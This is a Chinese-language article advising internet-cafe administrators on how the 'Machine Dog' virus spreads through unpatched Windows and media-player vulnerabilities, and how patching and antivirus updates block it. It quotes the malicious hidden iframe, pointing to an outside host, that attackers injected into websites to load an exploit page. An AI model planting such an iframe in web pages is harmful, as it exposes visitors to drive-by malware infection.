冷静分析寻找“机器狗”病毒弱点

      从“机器狗”病毒的传播过程不难发现，能够破坏还原系统并不是“机器狗”病毒最具破坏力的地方，而是其通过IE链接进入网吧计算机系统，并自动下载木马程序。为此，我们寻找“机器狗”病毒的弱点之时，不要一味想着如何防止病毒破坏网吧计算机系统的还原系统，而是要如何切断“机器狗”病毒的传播途径。试想，封杀了“机器狗”病毒的传播方式，病毒又如何破坏网吧计算机的还原系统呢？通俗的说，要想消灭“机器狗”病毒，必须找到病毒的“根”，正所谓斩草除根嘛。

      在传播途径上，杀毒软件厂商经过研究后发现，“机器狗”病毒的传播主要是利用系统或应用软件的漏洞进行的。下面，笔者一一列举可以为“机器狗”病毒传播提供便捷通道的系统漏洞和应用软件漏洞。

      MS07-017漏洞：最初，“机器狗”病毒是利用下面一段代码进行传播的，代码内容如下：<iframe src="http://xx.exiao01.com/2.htm" width="20" height="1" frameborder="0"></iframe>病毒作者会将上述代码植入到各大网站中。查看被调用的2.htm的内容不难发现，病毒利用了操作系统的ANI漏洞加载木马，而这一过程恰恰是对微软操作系统MS07-017漏洞的“巧妙”应用。如果网吧机器没有安装MS07-017补丁，一旦访问了病毒代码，“机器狗”病毒便会不请自来。

图二MS07-017漏洞对XP操作系统的影响

      MS06-014漏洞：这个漏洞是很多网管都熟悉的一个系统漏洞，即IE自动下载。如果系统存在该漏洞的话，一旦计算机访问到带有“机器狗”病毒代码的网页，会利用IE浏览器的自动下载并执行的漏洞，就这样，“机器狗”病毒就在计算机中安营扎寨。

      在网吧的应用环境中，通过IE浏览器上网是每台计算机都有的操作，这无疑加大了感染“机器狗”病毒的机率。由于“机器狗”病毒是通过恶意代码进行传播的，也就是说，凡是可以执行网页代码的应用软件，都有可能成为“机器狗”病毒的传播渠道。

      细数网吧的各种应用软件，影音播放软件也是“机器狗”病毒的一大传播通道。众所周知，不少病毒作者会将病毒代码植入影音文件中，一旦用户使用诸如Realplayer等支持网页浏览的播放软件，病毒代码就会被执行，计算机将会感染病毒。Realplayer播放器、百度搜霸、PPStream播放器，以及迅雷客户端，都是“机器狗”病毒传播可以利用的通道。

      至此，我们找到了消灭“机器狗”病毒的方向。如果网吧计算机的操作系统及应用软件没有漏洞，“机器狗”病毒是很难感染网吧计算机系统的，更不会破坏网吧计算机的还原软件。为此，我们只要利用技术手段切断“机器狗”病毒的传播，我们就可以彻底消灭“机器狗”病毒，这也是该病毒的一个弱点。

      根据弱点制订防范“机器狗”策略

      通过上文的叙述我们可以了解到，“机器狗”病毒其实是通过操作系统及应用软件的漏洞进行传播的。如果能够利用技术手段阻止病毒进入网吧计算机，“机器狗”病毒就很难在横行。阻止“机器狗”病毒传播的技术策略主要有以下几个方面：

      1、及时安装各类安全补丁：从上文的叙述可以得知，网吧计算机之所以会感染“机器狗”病毒，因为操作系统和一些应用软件存在着诸多的安全漏洞，为此，网管必须在第一时间内安装操作系统和应用软件的安全补丁。

      网吧使用的是微软的操作系统，默认情况下，操作系统的自动更新功能是打开的，一旦微软发布新的安全补丁，自动更新功能将会自动安装这些安全补丁。对于诸如Realplayer等应用软件的安全漏洞，建议网管定期升级，一旦软件厂商推出了新版本，及时将网吧电脑的各种应用软件更新到最新的版本。为了方便检查网吧系统漏洞，笔者建议安装“奇虎360安全卫士”，因为该软件不仅可以检测操作系统的安全漏洞，还可以检测诸如Office和Realplay等应用软件的漏洞，并且支持自动安装。

图三软件的安全补丁

      2、及时更新病毒库：“机器狗”病毒入侵计算机的过程，其实是通过一个含有恶意代码网页进行传播的。对于一些恶意代码，一部分杀毒软件是具备查杀能力的。为此，要想准确的查杀带有“机器狗”病毒的恶意网页代码，必须及时更新病毒库。